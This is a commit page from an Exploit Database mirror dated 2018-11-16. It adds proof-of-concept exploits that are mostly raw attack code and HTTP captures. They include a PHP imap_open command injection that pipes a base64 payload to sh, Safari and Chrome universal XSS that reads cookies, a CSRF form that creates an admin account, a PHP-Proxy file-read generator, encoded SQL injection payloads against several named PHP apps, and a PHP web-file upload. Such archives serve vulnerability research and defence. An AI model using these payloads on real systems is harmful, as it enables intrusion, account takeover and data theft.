bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-11-16

Browse source 
21 changes to exploits/shellcodes

Notepad3 1.0.2.350 - Denial of Service (PoC)

PHP 5.2.3 - Win32std ext. 'safe_mode' / 'disable_functions' Protections Bypass
PHP 5.2.3 Win32std - 'win_shell_execute' Safe Mode / Disable Functions Bypass

PHP 5.2.4 'ionCube' Extension - 'safe_mode' / disable_functions Bypass
PHP 5.2.4 ionCube - 'ioncube_read_file' Safe Mode / Disable Functions Bypass

PHP 5.x - COM functions 'Safe_mode()' / 'disable_function' Bypass
PHP 5.x COM - Safe Mode / Disable Functions Bypass

VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Root Privilege Escalation
VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Local Privilege Escalation

Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation
Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Privilege Escalation

Libuser - 'roothelper' Privilege Escalation (Metasploit)
Libuser - 'roothelper' Local Privilege Escalation (Metasploit)

Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit)
Linux 4.4.0 < 4.4.0-53 - 'AF_PACKET chocobo_root' Local Privilege Escalation (Metasploit)

Sun Solaris 11.3 AVS - Local Kernel root Exploit
Sun Solaris 11.3 AVS Kernel - Local Privilege Escalation
PHP 5.2.3 imap (Debian Based) - 'imap_open' Disable Functions Bypass
Webkit (Safari) - Universal Cross-site Scripting
Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting

PHP < 5.6.2 - 'Shellshock' 'disable_functions()' Bypass Command Injection
PHP < 5.6.2 - 'Shellshock' Safe Mode / Disable Functions Bypass / Command Injection

PHP 5.5.9 - CGIMode FPM WriteProcMemFile Bypass Disable Function
PHP 5.5.9 - 'zend_executor_globals' 'CGIMode FPM WriteProcMemFile' Disable Functions Bypass / Load Dynamic Library

PHP Imagick 3.3.0 - disable_functions Bypass
Imagick 3.3.0 (PHP 5.4) - Disable Functions Bypass
Precurio Intranet Portal 2.0 - Cross-Site Request Forgery (Add Admin)
PHP-Proxy 5.1.0 - Local File Inclusion
BitZoom 1.0 - 'rollno' SQL Injection
Net-Billetterie 2.9 - 'login' SQL Injection
Galaxy Forces MMORPG 0.5.8 - 'type' SQL Injection
EverSync 0.5 - Arbitrary File Download
Meneame English Pligg 5.8 - 'search' SQL Injection
Kordil EDMS 2.2.60rc3 - Arbitrary File Upload
Simple E-Document 1.31 - 'username' SQL Injection
2-Plan Team 1.0.4 - Arbitrary File Upload
PHP Mass Mail 1.0 - Arbitrary File Upload
Wordpress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting
This commit is contained in:
Offensive Security 2018-11-16 05:01:40 +00:00
parent 1d25aee539
commit 268e737bb6
22 changed files with 899 additions and 16 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
exploits/hardware/dos/38475.txt
View file

@ -13,7 +13,7 @@ Reported:
Public release:
Author: Lyon Yang <lyon[at]vantagepoint[dot]sg> <lyon.yang.s[at]gmail[dot]com>
Paper: https://www.exploit-db.com/docs/39658.pdf
Paper: https://www.exploit-db.com/docs/english/39658-exploiting-buffer-overflows-on-mips-architecture.pdf
Summary:
--------

7
exploits/linux/local/45865.php Normal file
View file

@ -0,0 +1,7 @@
<?php
# https://antichat.com/threads/463395/#post-4254681
# echo '1234567890'>/tmp/test0001
$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";
imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());

23
exploits/multiple/local/45866.html Normal file
View file

@ -0,0 +1,23 @@
<!--
# CVE-2017-7089
**Impact**: Processing maliciously crafted web content may lead to universal cross site scripting
**Description**: A logic issue existed in the handling of the parent-tab. This issue was addressed with improved state management.
#### Safari 10
##### Local SOP bypass
```html
<script> function Pew(){var doc=open('parent-tab://apple.com');doc.document.body.innerHTML='<img src=q onerror=alert(document.cookie)>';}</script><button onclick=Pew();>Click me!</button>
```
##### Exploit by Frans Rosén
```html
data:text/html,<script>function y(){x=open('parent-tab://google.com','_top'),x.document.body.innerHTML='<img/src=""onerror="alert(document.cookie)">'};setTimeout(y,100)</script>
```
-->
<body onload=document.getElementById('pew').click()>
<a id='pew' href='data:text/html,<script>function y(){x=open(&#x27;parent-tab://apple.com&#x27;,&#x27;_top&#x27;),x.document.body.innerHTML=&#x27;<img/src=""onerror=alert(document.domain);alert(document.cookie);>&#x27;};setTimeout(y,100)</script>'>hello</a>
</body>

36
exploits/multiple/local/45867.txt Normal file
View file

@ -0,0 +1,36 @@
<?php
$filename=realpath("PoC.mht");
header( "Content-type: multipart/related");
readfile($filename);
?>
MIME-Version: 1.0
Content-Type: multipart/related;
type="text/html";
boundary="----MultipartBoundary--"
CVE-2017-5124
------MultipartBoundary--
Content-Type: application/xml;
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xml" href="#stylesheet"?>
<!DOCTYPE catalog [
<!ATTLIST xsl:stylesheet
id ID #REQUIRED>
]>
<xsl:stylesheet id="stylesheet" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="*">
<html><iframe style="display:none" src="https://google.com"></iframe></html>
</xsl:template>
</xsl:stylesheet>
------MultipartBoundary--
Content-Type: text/html
Content-Location: https://google.com
<script>alert('Location origin: '+location.origin)</script>
------MultipartBoundary----

2
exploits/multiple/remote/36839.py
View file

@ -9,7 +9,7 @@
# Tested on: AirTies RT-204v3
# CVE : 2013-0230
# Exploit gives a reverse shell to lhost:lport
# Details: https://www.exploit-db.com/docs/36806.pdf
# Details: https://www.exploit-db.com/docs/english/36806-developing-mips-exploits-to-hack-routers.pdf
import urllib2
from string import join

3
exploits/php/webapps/38127.php
View file

@ -1,5 +1,6 @@
<?php
// EDB Note: Paper https://www.exploit-db.com/docs/38104.pdf
// EDB Note: Paper https://www.exploit-db.com/docs/english/38104-shoot-zend_executor_globals-to-bypass-php-disable_functions.pdf
error_reporting(0x66778899);
set_time_limit(0x41424344);
define('ZEND_INI_USER', (1<<0));

87
exploits/php/webapps/45860.txt Normal file
View file

@ -0,0 +1,87 @@
# Exploit Title: Precurio Intranet Portal 2.0 - Cross-Site Request Forgery (Add Admin)
# Dork: N/A
# Date: 2018-11-12
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.precurio.org
# Software Link: https://netcologne.dl.sourceforge.net/project/precurio/version%202.1/precurio.zip
# Version: 2.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/public/admin/user/submitnew
#
POST /[PATH]/public/admin/user/submitnew HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: multipart/form-data; boundary=
---------------------------2118278047894297530396667654
Content-Length: 1119
-----------------------------2118278047894297530396667654
Content-Disposition: form-data; name="user_id"
-----------------------------2118278047894297530396667654
Content-Disposition: form-data; name="date_created"
1542055034
-----------------------------2118278047894297530396667654
Content-Disposition: form-data; name="first_name"
efe
-----------------------------2118278047894297530396667654
Content-Disposition: form-data; name="last_name"
efe
-----------------------------2118278047894297530396667654
Content-Disposition: form-data; name="email"
efeomerefe.com
-----------------------------2118278047894297530396667654
Content-Disposition: form-data; name="password"
efe
-----------------------------2118278047894297530396667654
Content-Disposition: form-data; name="department_id"
0
-----------------------------2118278047894297530396667654
Content-Disposition: form-data; name="location_id"
0
-----------------------------2118278047894297530396667654
Content-Disposition: form-data; name="submit"
Submit
-----------------------------2118278047894297530396667654--
HTTP/1.1 302 Found
Date: Mon, 12 Nov 2018 20:51:19 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PRECURIOSESSID=0ddb3o3ade8g3vn2qb3q4jhe61; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /[PATH]/public/admin/user/edit/id/11
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/public/admin/user/submitnew
#
<html>
<body>
<form enctype="multipart/form-data" action="http://localhost/[PATH]/public/admin/user/submitnew" method="post">
<input name="user_id" value="" type="hidden">
<input name="date_created" value="1542055034" type="hidden">
<input name="first_name" placeholder="first_name" value="" type="text"></dd>
<input name="last_name" placeholder="last_name" value="" type="text"></dd>
<input name="email" placeholder="email" value="" type="text"></dd>
<input name="password" placeholder="password" value="" type="text"></dd>
<input name="department_id" value="0" type="hidden">
<input name="location_id" value="0" type="hidden">
<input name="submit" value="Submit" type="submit">
</form>
</body>
</html>

47
exploits/php/webapps/45861.txt Normal file
View file

@ -0,0 +1,47 @@
# Exploit Title: PHP-Proxy 5.1.0 - Local File Inclusion
# Date: 2018-11-13
# Exploit Author: Ameer Pornillos
# Contact: https://ethicalhackers.club
# Vendor Homepage: https://www.php-proxy.com/
# Software Link: https://www.php-proxy.com/download/php-proxy.zip
# Version: 5.1.0
# Category: Webapps
# Tested on: XAMPP on Win10_x64
# Description: Downloadable pre-installed version of PHP-Proxy 5.1.0
# make use of a default app_key wherein can be used for local file inclusion
# attacks. This can be used to generate encrypted string which
# can gain access to arbitrary local files in the server.
# http://php-proxy-site/index.php?q=[encrypted_string_value]
# CVE: CVE-2018-19246
# POC:
# 1)
# Generate encrypted string value using the PHP script below
# 2)
# Browse to URL
# http://php-proxy-site/index.php?q=[encrypted_string_value]
# to read local file
<?php
$file = "file:///C:/xampp/passwords.txt"; //example target file to read
$ip = "192.168.0.1"; //change depending on your IP address that access the app
$app_key = "aeb067ca0aa9a3193dce3a7264c90187";
$key = md5($app_key.$ip);
function str_rot_pass($str, $key, $decrypt = false){
$key_len = strlen($key);
$result = str_repeat(' ', strlen($str));
for($i=0; $i<strlen($str); $i++){
if($decrypt){
$ascii = ord($str[$i]) - ord($key[$i % $key_len]);
} else {
$ascii = ord($str[$i]) + ord($key[$i % $key_len]);
}
$result[$i] = chr($ascii);
}
return $result;
}
function base64_url_encode($input){
return rtrim(strtr(base64_encode($input), '+/', '-_'), '=');
}
echo base64_url_encode(str_rot_pass($file, $key));
?>

87
exploits/php/webapps/45862.txt Normal file
View file

@ -0,0 +1,87 @@
# Exploit Title: BitZoom 1.0 - 'rollno' SQL Injection
# Dork: N/A
# Date: 2018-11-14
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://bitzoom.sourceforge.io/
# Software Link: https://excellmedia.dl.sourceforge.net/project/bitzoom/bitzoom-master.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/forgot.php
#
POST /PATH/forgot.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=rsq0813q4hl4dtbfesogugiln3
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 572
rollno=%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2d%2d%20%2d
HTTP/1.1 200 OK
Date: Wed, 14 Nov 2018 11:17:49 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2488
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/forgot.php
#
POST /PATH/forgot.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=rsq0813q4hl4dtbfesogugiln3
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 574
username=%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2d%2d%20%2d
HTTP/1.1 200 OK
Date: Wed, 14 Nov 2018 11:17:52 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2486
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 3)
# http://localhost/[PATH]/login.php
#
POST /PATH/login.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 592
username=%31%32%27%7c%28%53%65%6c%65%43%54%20%27%45%66%65%27%20%46%72%6f%4d%20%64%75%41%4c%20%57%68%65%52%45%20%31%31%30%3d%31%31%30%20%41%6e%44%20%28%73%65%4c%45%63%54%20%31%31%32%20%66%72%4f%4d%28%53%45%6c%65%63%54%20%43%6f%75%4e%54%28%2a%29%2c%43%6f%6e%43%41%54%28%44%41%54%41%42%41%53%45%28%29%2c%28%53%65%4c%45%63%74%20%28%45%4c%54%28%31%31%32%3d%31%31%32%2c%31%29%29%29%2c%46%4c%6f%6f%52%28%52%41%6e%64%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%72%6d%61%74%49%4f%4e%5f%53%63%68%45%4d%41%2e%50%6c%75%47%49%4e%53%20%67%72%4f%55%70%20%42%59%20%78%29%61%29%29%7c%27&password=Efe
HTTP/1.1 200 OK
Date: Wed, 14 Nov 2018 11:03:08 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 585
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

61
exploits/php/webapps/45863.txt Normal file
View file

@ -0,0 +1,61 @@
# Exploit Title: Net-Billetterie 2.9 - 'login' SQL Injection
# Dork: N/A
# Date: 2018-11-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://net-billetterie.tuxfamily.org/
# Software Link: https://netix.dl.sourceforge.net/project/netbilletterie/Netbilletterie2.9.zip
# Version: 2.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/login.inc.php
#
# //login.inc.php
# ....
#18 if (isset ($_POST) && !empty($_POST['login']) && !empty($_POST['pass']))
#19 {
#20 extract($_POST);
#21 $pass=md5($pass);
#22
#23 $sql="SELECT * FROM ".$tblpref."user WHERE login='$login' AND pwd='$pass' ";
#24 $req=mysql_query($sql) or die (mysql_error());
#25 if( mysql_num_rows($req)>0)
#26 {
#27 $data = mysql_fetch_array($req);
#28 $login = $data['login'];
#29 $num=$data['num'];
#30
#31 $_SESSION['Auth']=array(
#32 'login' =>$login,
#33 'pass' =>$pass,
#34 'lang' =>'fr',
#35 'tblpref'=>$tblpref,
#36 'num' =>$num
# ....
POST /[PATH]/login.inc.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=ahn0q4qtr7adcj7kol54879rv0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 579
login=%31%27%20%4f%52%20%28%53%45%4c%45%43%54%20%31%31%32%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%31%32%3d%31%31%32%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%2d%2d%20Efe&pass=Efe
HTTP/1.1 200 OK
Date: Tue, 13 Nov 2018 10:57:05 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 84
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

41
exploits/php/webapps/45864.txt Normal file
View file

@ -0,0 +1,41 @@
# Exploit Title: Galaxy Forces MMORPG 0.5.8 - 'type' SQL Injection
# Dork: N/A
# Date: 2018-11-14
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://galaxy.alyx.pl/
# Software Link: https://excellmedia.dl.sourceforge.net/project/galaxyforces/galaxy/0.5.8/galaxy-0.5.8.7z
# Version: 0.5.8
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# Users..
# http://localhost/[PATH]/ads.php
#
# action=add&title=[Do not leave empty..]&type=[SQL]&time=[Do not leave empty..]&message=[Do not leave empty..]
#
POST /PATH/ads.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: RID=d3fada0e6d425fdf; login=efe; salt=b5c59c9626445d978940049594f60c858642d268; agree=true
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 368
action=add&title=[Efe]&type=%27%7c%7c(SeleCT%20'%45%66%65'%20FroM%20duAL%20WheRE%20110%3d110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*)%2cConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT%28%31%31%32%3d%31%31%32%2c%31%29%29%29%2cFLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))%7c%7c%27&time=[Efe]&message=[Efe]
HTTP/1.1 302 Found
Date: Wed, 14 Nov 2018 15:12:30 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: RID=44ff5c8a0c395f9b; expires=Wed, 14-Nov-2018 16:12:30 GMT; Max-Age=3600
Set-Cookie: login=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0
Set-Cookie: salt=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0
Content-Length: 0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
#Etc..

35
exploits/php/webapps/45868.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: EverSync 0.5 - Arbitrary File Download
# Dork: N/A
# Date: 2018-11-14
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://phpmassmail.sourceforge.io/
# Software Link: https://datapacket.dl.sourceforge.net/project/eversync/Downloads/alpha/EverSync-Pre-alpha05.zip
# Version: 0.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC: Dztabase Download
# 1)
# http://localhost/[PATH]/files/db.sq3
#
GET /[PATH]/files/db.sq3 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=dhq0fbvco8d0sc0lem3l2kktk0
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Wed, 14 Nov 2018 19:47:32 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
Last-Modified: Wed, 14 Nov 2018 19:37:00 GMT
ETag: "3800-57aa50ed0a29c"
Accept-Ranges: bytes
Content-Length: 14336
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

30
exploits/php/webapps/45875.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: Meneame English Pligg 5.8 - 'search' SQL Injection
# Dork: N/A
# Date: 2018-11-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://sourceforge.net/projects/meneame-english/
# Software Link: https://master.dl.sourceforge.net/project/meneame/meneame/Beta%205.8/Pligg_Beta_5.8.rar
# Version: 5.8
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?search=[SQL]
#
GET /[PATH]/?search=%61%27%29%20%41%4e%44%20(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))%20--%20Efe HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Tue, 13 Nov 2018 15:10:50 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 7044
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

153
exploits/php/webapps/45876.txt Normal file
View file

@ -0,0 +1,153 @@
# Exploit Title: Kordil EDMS 2.2.60rc3 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-11-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.kordil.net/
# Software Link: https://vorboss.dl.sourceforge.net/project/kordiledms/Kordil%20EDMS%20v2.2.60rc3/kordil_edms_installer.exe
# Version: 2.2.60rc3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# Users...
# 1)
# http://localhost/[PATH]/routine_emails_to_all_users_add.php
#
POST /[PATH]/routine_emails_to_all_users_add.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=187947eb3de6ad8f5541f2c8d8e94225
Connection: keep-alive
Content-Type: multipart/form-data; boundary=
---------------------------114917121519378418451544589507
Content-Length: 973
-----------------------------114917121519378418451544589507
Content-Disposition: form-data; name="add_fd1"
admin
-----------------------------114917121519378418451544589507
Content-Disposition: form-data; name="add_fd2"
Efe
-----------------------------114917121519378418451544589507
Content-Disposition: form-data; name="add_fd3"
2018-11-13 15:04:48
-----------------------------114917121519378418451544589507
Content-Disposition: form-data; name="upload_fd4"; filename="phpinfo.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------114917121519378418451544589507
Content-Disposition: form-data; name="add_fd5"
-----------------------------114917121519378418451544589507
Content-Disposition: form-data; name="act"
n
-----------------------------114917121519378418451544589507
Content-Disposition: form-data; name="QS_Submit"
Add
-----------------------------114917121519378418451544589507--
HTTP/1.1 302 Found
Date: Tue, 13 Nov 2018 12:15:22 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: ./routine_emails_to_all_users.php?
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
GET /PATH/email_attachment/admin-13.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/[PATH]/routine_emails_to_all_users.php?
Cookie: PHPSESSID=187947eb3de6ad8f5541f2c8d8e94225
Connection: keep-alive
HTTP/1.1 200 OK
Date: Tue, 13 Nov 2018 12:15:30 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9
X-Powered-By: PHP/5.2.9
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
# POC:
# 2)
# http://localhost/[PATH]/routine_emails_to_all_users_add.php
#
# http://localhost/[PATH]/email_attachment//[FILE]
#
<html>
<body>
<form name="qs_add_form" method="post" action="http://localhost/[PATH]/routine_emails_to_all_users_add.php" enctype="multipart/form-data">
<input type="hidden" name="add_fd1" value="admin">
<input type="text" name="add_fd2" value="Efe">
<input type="hidden" name="add_fd3" value=" 2018-11-13 15:04:48">
<input type="file" name="upload_fd4" id="File">
<input type="text" name="add_fd5" value="" hidden="true">
<input type="hidden" name="act" value="n">
<input type="submit" name="QS_Submit" value="Add">
</form>
</body>
</html>
# POC:
# 3)
# http://localhost/[PATH]/users_edit.php?currentrow_fd0=[SQL]
#
GET /PATH/users_edit.php?currentrow_fd0=%2d%31%20%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
